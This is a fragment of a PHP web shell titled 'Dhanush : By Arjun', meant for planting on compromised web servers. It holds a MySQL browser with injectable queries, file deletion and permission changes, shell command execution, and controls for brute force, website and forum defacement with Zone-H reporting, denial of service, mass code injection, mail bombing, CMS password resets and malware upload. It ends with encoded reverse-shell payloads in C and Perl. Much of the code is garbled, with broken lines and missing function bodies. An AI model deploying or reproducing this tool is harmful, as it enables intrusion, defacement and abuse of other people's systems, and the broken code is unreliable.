s);
$sql = mysql_query("SELECT `COLUMN_NAME` FROM ìnformati
on_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$t
ablename') AND (`COLUMN_KEY` = 'PRI');");
$row = mysql_fetch_array($sql);
$rowid = $row['COLUMN_NAME'];
echo "<br><font size=4 color =lime>Data in Table</font><
br>";
if( $tablename != "" )
echo "<font size=3 class=txt>$dbname > $table
name</font><br>";
else
echo "<font size=3 class=txt>$dbname</font><br>"
;
$queryStr = "";
$pag = 0;
$queryStr = stripslashes( $queryStr );
if( $queryStr == "" )
{
if(isset($_REQUEST['page']))
{
$res = mysql_query("select * from $table
name");
$getres = mysql_num_rows($res);
$coun = ceil($getres/30);
if($_REQUEST['page'] != 1)
$pag = $_REQUEST['page'] * 30;
else
$pag = $_REQUEST['page'] * 30;
$queryStr = "SELECT * FROM $tablename LI
MIT $pag,30";
$sql = mysql_query("SELECT $rowid FROM $

tablename ORDER BY $rowid LIMIT $pag,30");
$arrcount = 1;
$arrdata[$arrcount] = 0;
while($row = mysql_fetch_array($sql))
{
$arrdata[$arrcount] = $row[$rowi
d];
$arrcount++;
}
}
else
{
$queryStr = "SELECT * FROM $tablename LI
MIT 0,30";
$sql = mysql_query("SELECT $rowid FROM $
tablename ORDER BY $rowid LIMIT 0,30");
$arrcount = 1;
$arrdata[$arrcount] = 0;
while($row = mysql_fetch_array($sql))
{
$arrdata[$arrcount] = $row[$rowi
d];
$arrcount++;
}
}
if( $orderby != "" )
$queryStr .= " ORDER BY $orderby";
echo "<a href=# onClick=\"viewtables('viewSchema
','$dbname','$tablename')\"><font size=3>Schema</font></a>\n";
}
$pResult = mysql_query($queryStr );
$fieldt = mysql_fetch_field($pResult);
$tablename = $fieldt->table;
$errMsg = mysql_error();
$GLOBALS[queryStr] = $queryStr;
if( $pResult == false )
{
echoQueryResult();
return;
}
if( $pResult == 1 )
{
$errMsg = "Success";
echoQueryResult();
return;
}
echo "<hr color='#1B1B1B'>\n";
$row = mysql_num_rows( $pResult );
$col = mysql_num_fields( $pResult );
if( $row == 0 )
{
echo "<font size=3>No Data Exist!</font>";
return;
}
if( $rowperpage == "" ) $rowperpage = 30;
if( $page == "" ) $page = 0;
else $page--;
mysql_data_seek( $pResult, $page * $rowperpage );
echo "<table cellspacing=1 cellpadding=5 border=1 align=
center>\n";
echo "<tr>\n";
for( $i = 0; $i < $col; $i++ )
{
$field = mysql_fetch_field( $pResult, $i );
echo "<th>";
if($action == "viewdata")
echo "<a href='$PHP_SELF?action=viewdata
&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."<
/a>\n";
else
echo $field->name."\n";
echo "</th>\n";
}
echo "<th colspan=2>Action</th>\n";
echo "</tr>\n";
$num=1;
$acount = 1;
for( $i = 0; $i < $rowperpage; $i++ )
{
$rowArray = mysql_fetch_row( $pResult );
if( $rowArray == false ) break;
echo "<tr>\n";
$key = "";
for( $j = 0; $j < $col; $j++ )
{
$data = $rowArray[$j];
$field = mysql_fetch_field( $pResult, $j
);
if( $field->primary_key == 1 )
$key .= "&" . $field->name . "="
. $data;
if( strlen( $data ) > 30 )
$data = substr( $data, 0, 30 ) .
"...";
$data = htmlspecialchars( $data );
echo "<td>\n";
echo "<font class=txt>$data</font>\n";
echo "</td>\n";
}
if(!is_numeric($arrdata[$acount]))
echo "<td colspan=2>No Key</td>\n";
else
{
echo "<td><a href=# onClick=\"viewtables
('editData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Edit</a></td>
\n";
echo "<td><a href=# onClick=\"viewtables
('deleteData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Delete</a><
/td>\n";
$acount++;
}
}
echo "</tr>\n";
echo "</table>";
if($arrcount > 30)
{
$res = mysql_query("select * from $tablename");
$getres = mysql_num_rows($res);
$coun = ceil($getres/30);
echo "<form action=$self><input type=hidden valu
e=viewdata name=action><input type=hidden name=tablename value=$tablename><input
type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page cl
ass=sbox>";
for($i=0;$i<$coun;$i++)
echo "<option value=$i>$i</option>";
echo "</select> <input type=button onClick=\"vie
wtables('viewdata','$dbname','$tablename','','','','',page.value)\" value=Go cla
ss=but></form>";
echo "<br><div><font color=white size=3>[ $dbnam
e ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables
('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>&g
t;</font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\">
<font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=
3>[ Log Out ]</font> </a></div>";
}
}
// Delete Table Data
if($_GET['action'] == "deleteData")
{
s);
$row = $row['COLUMN_NAME'];
$rowid = $_GET[$row];
mysql_query("delete from $tablename where $row = '$rowid
'");
listtable();
}
// Edit Table Data
if($_GET['action'] == "editData")
{
global $queryStr, $action, $mysqlHandle, $dbname, $table

name, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
?>
<br><br>
<?php
s);
$rowid = $_GET[$row];
$pResult = mysql_list_fields( $dbname, $tablename );
$num = mysql_num_fields( $pResult );
$key = "";
for( $i = 0; $i < $num; $i++ )
{
$field = mysql_fetch_field( $pResult, $i );
if( $field->primary_key == 1 )
if( $field->numeric == 1 )
$key .= $field->name . "=" . $GL
OBALS[$field->name] . " AND ";
else
$key .= $field->name . "='" . $G
LOBALS[$field->name] . "' AND ";
}
$key = substr( $key, 0, strlen($key)-4 );
mysql_select_db( $dbname, $mysqlHandle );
$pResult = mysql_query( $queryStr = "SELECT * FROM $tab
lename WHERE $row = $rowid", $mysqlHandle );
$data = mysql_fetch_array( $pResult );
echo
echo
echo
echo
echo
echo
echo
"<table cellspacing=1 cellpadding=2 border=1>\n";

"<tr>\n";
"<th>Name</th>\n";
"<th>Type</th>\n";
"<th>Function</th>\n";
"<th>Data</th>\n";
"</tr>\n";
$pResult = mysql_db_query( $dbname, "SHOW fields FROM $t

ablename" );

$pResultLen = mysql_list_fields( $dbname, $tablename );
$fundata1 = "'action','editsubmitData','dbname','".$dbna
me."','tablename','".$tablename."',";
$fundata2 = "'action','insertdata','dbname','".$dbname."
','tablename','".$tablename."',";
for( $i = 0; $i < $num; $i++ )
{
$fieldtype = $field["Type"];
$len = mysql_field_len( $pResultLen, $i );
echo
echo
echo
echo
echo
"<tr>";
"<td>$fieldname</td>";
"<td>".$field["Type"]."</td>";
"<td>\n";
"<select name=${fieldname}_function class=s
box>\n";
echo "<option>\n";
echo "<option>ASCII\n";
echo "<option>CHAR\n";
echo "<option>SOUNDEX\n";
echo "<option>CURDATE\n";
echo "<option>CURTIME\n";
echo "<option>FROM_DAYS\n";
echo "<option>FROM_UNIXTIME\n";
echo "<option>NOW\n";
echo "<option>PASSWORD\n";
echo "<option>PERIOD_ADD\n";
echo "<option>PERIOD_DIFF\n";
echo "<option>TO_DAYS\n";
echo "<option>USER\n";
echo "<option>WEEKDAY\n";
echo "<option>RAND\n";
echo "</select>\n";
echo "</td>\n";
$value = htmlspecialchars($data[$i]);
$type = strtok( $fieldtype, " (,)\n" );
if( $type == "enum" || $type == "set" )
{
echo "<td>\n";
if( $type == "enum" )
echo "<select name=$fieldname cl
ass=box>\n";
else if( $type == "set" )
echo "<select name=$fieldname si
ze=4 class=box multiple>\n";
while( $str = strtok( "'" ) )
{
if( $value == $str )
echo "<option selected>$
str\n";
else
echo "<option>$str\n";
strtok( "'" );
}
echo "</select>\n";
echo "</td>\n";
}
else
{
if( $len < 40 )
echo "<td><input type=te
xt size=40 maxlength=$len id=dhanush_$fieldname name=sql_$fieldname value=\"$val
ue\" class=box></td>\n";
else
echo "<td><textarea cols
=47 rows=3 maxlength=$len name=dhanush_$fieldname class=box>$value</textarea>\n"
;
}
$fundata1 .= "'dhanush_".$fieldname."',d
hanush_".$fieldname.".value,";
$fundata2 .= "'dhanush_".$fieldname."',d
hanush_".$fieldname.".value,";
echo "</tr>";
}
$fundata1=eregi_replace(',$', '', $fundata1);
$fundata2=eregi_replace(',$', '', $fundata2);
echo "</table><p>\n";
echo "<input type=button onClick=\"editdata($fundata1)\"
value='Edit Data' class=but>\n";
echo "<input type=button value='Insert' onClick=\"editda
ta($fundata2)\" class=but>\n";
echo "</form>\n";
}
}
// Edit Submit Table Data
else if($_REQUEST['action'] == "editsubmitData")
{
$dbname = $_POST['dbname'];
$tablename = $_POST['tablename'];
$sql = mysql_query("SELECT `COLUMN_NAME` FROM ìnformation_schema`.`COLU
MNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND
(`COLUMN_KEY` = 'PRI');");
$rowid = $_POST[$row];
$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
$rowcount = $num;
for( $i = 0; $i < $num; $i++ )
{
$arrdata = $_REQUEST[$fieldname];
$str .= " " . $fieldname . " = '" . $arrdata . "'";

$rowcount--;
if($rowcount != 0)
$str .= ",";
}
$str = "update $tablename set" . $str . " where $row=$rowid";
mysql_query($str);
?><div id="showsql"></div><?php
}
// Insert Table Data
else if($_REQUEST['action'] == "insertdata")
{
$dbname = $_POST['dbname'];
$tablename = $_POST['tablename'];
$sql = mysql_query("SELECT `COLUMN_NAME` FROM ìnformation_schema`.`COLU
MNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND
(`COLUMN_KEY` = 'PRI');");
$rowid = $_POST[$row];
$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
$rowcount = $num;
for( $i = 0; $i < $num; $i++ )
{
$arrdata = $_REQUEST[$fieldname];
$str1 .= "".$fieldname . ",";
$str2 .= "'".$arrdata . "',";
$rowcount--;
if($rowcount != 0)
{
//$str1 .= $fieldname . ",";
//$str2 .= $arrdata . ",";
}
}
$str1=eregi_replace(',$', '', $str1);
$str2=eregi_replace(',$', '', $str2);
$str = "INSERT INTO `$tablename` ($str1) VALUES ($str2);";
mysql_query($str);
?><div id="showsql"></div><?php
}
else if(isset($_GET['logoutdb']))
{
setcookie("dbserver",time() - 60*60);
setcookie("dbuser",time() - 60*60);
setcookie("dbpass",time() - 60*60);
header("Location:$self");
}
else if(isset($_POST['choice']))
{
if($_POST['choice'] == "delete")
{
$actbox = $_POST["actbox"];
foreach ($actbox as $myv)
$myv = explode(",",$myv);
foreach ($myv as $v)
{
if(is_file($v))
{
if(unlink($v))
echo "<br><center><font class=txt>File $
v Deleted Successfully</font></center>";
else
echo "<br><center>Cannot Delete File $v<
/center>";
}
else if(is_dir($v))
{
rrmdir($v);
}
}
}
else if($_POST['choice'] == "chmod")
{ ?>
<form id="chform"><?php
$actbox1 = $_POST['actbox'];
foreach ($actbox1 as $myv)
{ ?>
<input type="hidden" name="actbox3[]" id="actbox3[]" val
ue="<?php echo $v; ?>">
<?php }
?>
<table align="center" border="3" style="width:40%; borde
r-color:#333333;">
<tr>
<td style="height:40px" align="right">Ch
ange Permissions </td><td align="center"><input value="0755" name="chmode" class
="sbox" /></td>
</tr>
<tr>
<td colspan="2" align="center" style="he
ight:60px">
<input type="button" onClick="myaction('changefileperms'
,chmode.value)" value="Change Permission" class="but" style="padding: 5px;" /></
td>
</tr>
</table>
</form> <?php
}
else if($_POST['choice'] == "changefileperms")
{
if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
{
{
if(is_file($v) || is_dir($v))
{
$perms = 0;
for($i=strlen($_POST['chmode'])-1;$i>=0;
--$i)
$perms += (int)$_POST['chmode'][
$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
echo "<div align=left style=width:60%;>"
;
if(@chmod($v,$perms))
echo "<font class=txt>File $v Pe
rmissions Changed Successfully</font><br>";
else
echo "Cannot Change $v File Perm
issions<br>";
echo "</div>";
}
}
}
}
else if($_POST['choice'] == "compre")
{
{
if(is_file($v))
{
$zip = new ZipArchive();
$filename= basename($v) . '.zip';
if(($zip->open($filename, ZipArchive::CREATE))!=
=true)
{ echo '<br><font size=3>Error: Unable to creat
e zip file for $v</font>';}
else {echo "<br><font class=txt size=3>File $v C
ompressed successfully</font>";}
$zip->addFile(basename($v));
$zip->close();
}
else if(is_dir($v))
{
if($os == "Linux")
{
$filename= basename($v);
execmd("tar --create --recursion --file=
$filename.tar $v");
echo "<br><font class=txt size=3>File $v
Compressed successfully as $v.tar</font>";
}
}
}
}
else if($_POST['choice'] == "uncompre")
{
{
if(is_file($v) || is_dir($v))
{
$zip = new ZipArchive;
$filename= basename($v);
$res = $zip->open($filename);
if ($res === TRUE)
{
$pieces = explode(".",$filename);
$zip->extractTo($pieces[0]);
$zip->close();
echo "<br><font class=txt size=3>File $v Unzipp
ed successfully</font>";
} else
echo "<br><font size=3>Error: Unable to Unzip
file $v</font>";
}
}
}
}
else if(isset($_GET['sitename']))
{
$sitename = str_replace("http://","",$_GET['sitename']);
$sitename = str_replace("http://www.","",$sitename);
$sitename = str_replace("www.","",$sitename);
$show = myexe("ls -la /etc/valiases/".$sitename);
if(!empty($show))
echo $show;
else
echo "Cannot get the username";
}
else if(isset($_GET['mydata']))
{
listdatabase();
}
else if(isset($_GET['home']))
{
mainfun($_GET['home']);
}
else if(isset($_GET['dir']))
{
mainfun($_GET['myfilepath']);
}
else if(isset($_GET['mydirpath']))
{
echo is_writable($_GET['mydirpath'])?"<font class=txt>< writable >
</font>":"< not writable >";
}
else
{
?>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>Dhanush : By Arjun</title>
<script type="text/javascript">
checked = false;
var waitstate = "<center><marquee scrollamount=4 width=150>Wait....</marquee></c
enter>";
function checkedAll ()
{
if (checked == false){checked = true}else{checked = false}
for (var i = 0; i < document.getElementById('myform').elements.length; i
++)
{
document.getElementById('myform').elements[i].checked = checked;
}
}
function urlchange(myfilepath)
{
var mypath, mpath, i, t, j, r = "",myurl = "",splitter="";
splitter = "<?php echo addslashes($directorysperator); ?>";
mypath = mpath = myfilepath.split(splitter);
<?php if($os == "Linux") { ?>
r = "/";
myurl = "<a href=javascript:void(0) onClick=\"changedir(
'dir','/')\">/</a>";
<?php } ?>
for (i = 0; i < mypath.length; i++)
{
if(mypath[i] == "")
continue;
r += mypath[i]+"<?php echo addslashes($directorysperator); ?>";
myurl += "<a href=javascript:void(0) onClick=\"changedir('dir','
"+r+"\')\"><b>"+mypath[i]+"<?php echo addslashes($directorysperator); ?></b></a>
";
}
myurl = myurl.replace(/\\/g,"\\\\");
return myurl;
}
function wrtblDIR(mydirpath)
{
var ajaxRequest;
ajaxRequest = new XMLHttpRequest();
ajaxRequest.onreadystatechange = function()
{
if(ajaxRequest.readyState == 4)
{
for(i=0;i<=3;i++)
document.getElementsByName("wrtble")[i].innerHTM
L=ajaxRequest.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?&mydirpath=
"+mydirpath, true);
ajaxRequest.send(null);
}
function setpath(myfilpath)
{
wrtblDIR(myfilpath);
document.getElementById("path").value=myfilpath;
document.getElementById("createfile").value=myfilpath;
document.getElementById("createfolder").value=myfilpath;
document.getElementById("createfolder").value=myfilpath;
document.getElementById("exepath").value=myfilpath;
document.getElementById("auexepath").value=myfilpath;
document.getElementById("showdir").innerHTML="";
}
function changedir(myaction,myfilepath)
{
var myurl = urlchange(myfilepath);
document.getElementById("showmaindata").innerHTML=waitstate;
var ajaxRequest;
{
{
setpath(myfilepath);
document.getElementById("crdir").innerHTML=myurl;
document.getElementById("showmaindata").innerHTML=ajaxRe
quest.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+
"&myfilepath="+myfilepath, true);
}
function gethome(myaction,mydir)
{
var myurl = urlchange(mydir);
var ajaxRequest;
{
{
quest.responseText;
setpath(mydir);
document.getElementById("crdir").innerHTML=myurl;
}
}
"="+mydir, true);
}
function getname(sitename)
{
document.getElementById("showsite").innerHTML=waitstate;
var ajaxRequest;
{
{
document.getElementById("showsite").innerHTML=aj
axRequest.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?sitename="+
sitename, true);
}
function myaction(myfileaction,chmode)
{
var mytype = document.getElementsByName('actbox[]');
var mychoice = new Array();
for (var i = 0, length = mytype.length; i < length; i++)
{
if (mytype[i].checked)
mychoice[i] = mytype[i].value;
}
var params = "choice="+myfileaction+"&chmode="+chmode+"&actbox[]="+mycho
ice;
document.getElementById("showdir").innerHTML=waitstate;
var ajaxRequest;
{
{
document.getElementById("showdir").innerHTML=ajaxRequest
.responseText;
}
}
ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-url
encoded")
ajaxRequest.send(params);
}
function editdata()
{
var result = "", // initialize list
i,dbname,tablename;
// iterate through arguments
for (i = 1; i < arguments.length; i++)
{
if(i%2 == 0)
result += arguments[i]+'=';
else
result += arguments[i]+'&';
}
result = result.slice(0, -1);
dbname = arguments[3];
tablename = arguments[5];
var result=result.replace(/dhanush_/g,"");
var params = arguments[0]+"="+result;
document.getElementById("showsql").innerHTML=waitstate;
var ajaxRequest;
{
{
viewtables('listTables',dbname,tablename);
}
}
encoded")
}
function viewtables(action,dbname,tablename,rowid,arrdata,executequery,fieldname
,page)
{
var ajaxRequest;
{
{
document.getElementById("showsql").innerHTML=aja
xRequest.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?action="+ac
tion+"&dbname="+dbname+"&tablename="+tablename+"&"+rowid+"="+arrdata+"&executemy
query="+executequery+"&fieldname="+fieldname+"&page="+page, true);
}
function mydatabase(server,username,password)
{
var ajaxRequest;
{
{
mydatago();
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executeit&s
erver="+server+"&username="+username+"&password="+password, true);
}
function mydatago()
{
var ajaxRequest;
{
{
document.getElementById("datatable").style.display = 'no
ne';
document.getElementById("showsql").innerHTML=ajaxRequest
.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydata", tr
ue);
}
function bruteforce(prototype,serverport,login,dict)
{
var mytype = document.getElementsByName('mytype');
for (var i = 0, length = mytype.length; i < length; i++)
{
if (mytype[i].checked)
break;
}
var getreverse = 0;
if(document.getElementById('reverse').checked == true)
getreverse = 1;
else
getreverse = 0;
document.getElementById("showbrute").innerHTML=waitstate;
var ajaxRequest;
{
{
document.getElementById("showbrute").innerHTML=ajaxReque
st.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?prototype="
+prototype+"&serverport="+serverport+"&login="+login+"&dict="+dict+"&type="+myty
pe[i].value+"&reverse="+getreverse, true);
}
function executemyfile(action,executepath,execute)
{
var ajaxRequest;
{
{
quest.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+action+"&
executepath="+executepath+"&execute="+execute, true);
}
function maindata(myaction,dir)
{
var ajaxRequest;
{
{
quest.responseText;
document.getElementById("showdir").innerHTML="";
}
}
"="+myaction+"&dir="+dir, true);
}
function manuallyscriptfn(passwd)
{
var message = encodeURIComponent(passwd);
var params = "scriptlocator=scriptlocator&passwd="+passwd;
document.getElementById("showdata").innerHTML=waitstate;
var ajaxRequest;
{
{
document.getElementById("showdata").innerHTML=ajaxReques
t.responseText;
}
}
encoded")
}
function my404page(message)
{
var message = encodeURIComponent(message);
var params = "404page=404page&message="+message;
var ajaxRequest;
{
{
t.responseText;
}
}
encoded")
}
function executemyfn(executepath,executemycmd)
{
document.getElementById("showexecute").innerHTML="Wait....";
var ajaxRequest;
{
{
document.getElementById("showexecute").innerHTML=ajaxReq
uest.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executepath
="+executepath+"&executemycmd="+executemycmd, true);
}
function zoneh(defacer,hackmode,reason,domain)
{
var domain = encodeURIComponent(domain);
var params = "SendNowToZoneH=SendNowToZoneH&defacer="+defacer+"&hackmode
="+hackmode+"&reason="+reason+"&domain="+domain;
document.getElementById("showzone").innerHTML=waitstate;
var ajaxRequest;
{
{
document.getElementById("showzone").innerHTML=ajaxReques
t.responseText;
}
}
encoded")
}
function savemyfile(file,content)
{
var content = encodeURIComponent(content);
var params = "content="+content+"&file="+file;

document.getElementById("showmydata").innerHTML=waitstate;
var ajaxRequest;
{
{
document.getElementById("showmydata").innerHTML=ajaxRequ
est.responseText;
}
}
encoded")
}
function renamefun(file,to)
{
var ajaxRequest;
{
{
est.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?renamemyfil
e&file="+file+"&to="+to, true);
}
function changeperms(chmode,myfilename)
{
var ajaxRequest;
{
{
est.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?chmode="+ch
mode+"&myfilename="+myfilename, true);
}
function defacefun(deface)
{
var ajaxRequest;

{
{
alert(ajaxRequest.responseText);
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?deface="+de
face, true);
}
function fileaction(myaction,myfilepath)
{
var ajaxRequest;
{
{
est.responseText;
}
}
"&myfilepath="+myfilepath, true);
}
function bypassfun(funct,functvalue,optiontype)
{
document.getElementById("showbyp").innerHTML=waitstate;
var ajaxRequest;
{
{
document.getElementById("showbyp").innerHTML=ajaxRequest
.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?bypassit&"+
funct+"="+functvalue+"&optiontype="+optiontype, true);
}
function dos(target,ip,port,timeout,exTime,no0fBytes,multiplier)
{
document.getElementById("showdos").innerHTML=waitstate;
var ajaxRequest;
{
{
document.getElementById("showdos").innerHTML=ajaxRequest
.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+target+"&
ip="+ip+"&port="+port+"&timeout="+timeout+"&exTime="+exTime+"&multiplier="+multi
plier+"&no0fBytes="+no0fBytes, true);
}
function createfile(filecreator,filecontent)
{
var mm = filecreator.slice(0, filecreator.lastIndexOf("<?php echo addsla
shes($directorysperator); ?>"));
var filecontent = encodeURIComponent(filecontent);
var params = "filecontent="+filecontent+"&filecreator="+filecreator;
var ajaxRequest;
{
{
gethome('home',mm);
.responseText;
}
}
encoded")
}
function createdir(create,createfolder)
{
var ajaxRequest;
{
{
.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+create+"=
"+createfolder, true);
}
function codeinsert(code)
{
var code = encodeURIComponent(code);
var params = "getcode="+code;
document.getElementById("showcode").innerHTML=waitstate;
var ajaxRequest;
{
{
document.getElementById("showcode").innerHTML=ajaxReques
t.responseText;
}
}
encoded")
}
function getmydata(mydata)
{
var ajaxRequest;
{
{
est.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, t
rue);
}
function getdata(mydata,myfile)
{
var ajaxRequest;
{
{
t.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata+"&
myfile="+myfile, true);
}
function getport(host,protocol,start,end)
{
document.getElementById("showports").innerHTML=waitstate;
var ajaxRequest;

{
{
document.getElementById("showports").innerHTML=ajaxReque
st.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?host=" + ho
st + "&protocol=" + protocol, true);
}
function changeforumpassword(forumpass,f1,f2,f3,f4,forums,tableprefix,ipbuid,new
ipbpass,username,newjoomlapass,uid,uname,newpass)
{
document.getElementById("showchangepass").innerHTML=waitstate;
var ajaxRequest;
{
{
document.getElementById("showchangepass").innerHTML=ajax
Request.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER['PHP_SELF']; ?>?forumpass&f
1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&forums=" + forums + "&pre
fix=" + tableprefix + "&ipbuid=" + ipbuid + "&newipbpass=" + newipbpass + "&user
name=" + username + "&newjoomlapass=" + newjoomlapass + "&uid=" + uid + "&uname=
" + uname + "&newpass=" + newpass, true);
}
function forumdefacefn(index,f1,f2,f3,f4,defaceforum,tableprefix,siteurl,head,al
ll,f5)
{
var index = encodeURIComponent(index);
var params = "forumdeface="+defaceforum+"&index=" + index + "&f1=" + f1
+ "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&tableprefix="+tableprefix+"&siteur
l="+siteurl+"&head="+head+"&alll="+alll+"&f5="+f5;
document.getElementById("showdeface").innerHTML=waitstate;
var ajaxRequest;
{
{
document.getElementById("showdeface").innerHTML=ajaxRequ
est.responseText;
}
}
encoded")
}
function codeinjector(pathtomass,mode,filetype,injectthis)
{
var injectthis = encodeURIComponent(injectthis);
var params = "pathtomass="+pathtomass+"&mode=" + mode + "&filetype=" + f
iletype + "&injectthis=" + injectthis;
document.getElementById("showinject").innerHTML=waitstate;
var ajaxRequest;
{
{
document.getElementById("showinject").innerHTML=ajaxRequ
est.responseText;
}
}
encoded")
}
function sendmail(mailfunction,to,subject,message,from,times,padding)
{
if(mailfunction == "massmailing")
var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+
subject+"&from=" + from + "&message=" + message;
else if(mailfunction == "dobombing")
var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+
subject+"&times=" + times + "&padding=" + padding + "&message=" + message;
document.getElementById("showmail").innerHTML=waitstate;
var ajaxRequest;
{
{
document.getElementById("showmail").innerHTML=ajaxReques
t.responseText;
}
}
encoded")
}
function execode(code)
{
var intext = document.getElementById('intext').checked;
var params = "code="+code+"&intext="+intext;
document.getElementById("showresult").innerHTML=waitstate;
var ajaxRequest;

{
{
document.getElementById("showresult").innerHTML=ajaxRequ
est.responseText;
}
}
encoded")
}
function malwarefun(malwork)
{
var malpath = document.getElementById('createfile').value;
document.getElementById("showmal").innerHTML="<center><marquee scrollamo
unt=4 width=150>Wait....</marquee></center>";
var ajaxRequest;
{
{
document.getElementById("showmal").innerHTML=ajaxRequest
.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+malwork+"
&path="+malpath, true);
}
function getexploit(wurl,path,functiontype)
{
document.getElementById("showexp").innerHTML=waitstate;
var ajaxRequest;
{
{
document.getElementById("showexp").innerHTML=ajaxRequest
.responseText;
}
}
ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?uploadurl&w
url="+wurl+"&functiontype="+functiontype+"&path="+path, true);
}
function showMsg(msg)
{
if(msg == 'smf')
{
document.getElementById('tableprefix').value="smf_";
document.getElementById('fid').style.display='block';
document.getElementById('wpress').style.display='none';
document.getElementById('joomla').style.display='none';
}
if(msg == 'mybb')
{
document.getElementById('tableprefix').value="mybb_";
}
if(msg == 'ipb' || msg == 'vb')
{
document.getElementById('tableprefix').value="";
}
if(msg == 'wp')
{
document.getElementById('tableprefix').value="wp_";
document.getElementById('wpress').style.display='block';
document.getElementById('fid').style.display='none';
}
if(msg == 'joomla')
{
document.getElementById('joomla').style.display='block';
document.getElementById('tableprefix').value="jos_";
document.getElementById('fid').style.display='none';
}
}
function checkforum(msg)
{
if(msg == 'smf')
{
document.getElementById('tableprefix').value="smf_";
document.getElementById('smfipb').style.display='block';
document.getElementById('myjoomla').style.display='none';
document.getElementById('wordpres').style.display='none';
}
if(msg == 'phpbb')
{
document.getElementById('tableprefix').value="phpb_";
}
if(msg == 'mybb')
{
document.getElementById('tableprefix').value="mybb_";
document.getElementById('smfipb').style.display='none';
}
if(msg == 'vb')
{
}
if(msg == 'ipb')
{
}
if(msg == 'wp')
{
document.getElementById('tableprefix').value="wp_";
document.getElementById('wordpres').style.display='block';
}
if(msg == 'joomla')
{
document.getElementById('myjoomla').style.display='block';
document.getElementById('tableprefix').value="jos_";
}
}
</script>
<body>
<?php
$back_connect_p="eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rg
g1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdq
d+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0
/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63
+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOo
kF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";
$backconnect_perl="eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOc
SAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7ku
ZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/Z
pTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQt
wrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBn
SB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2
FA=";
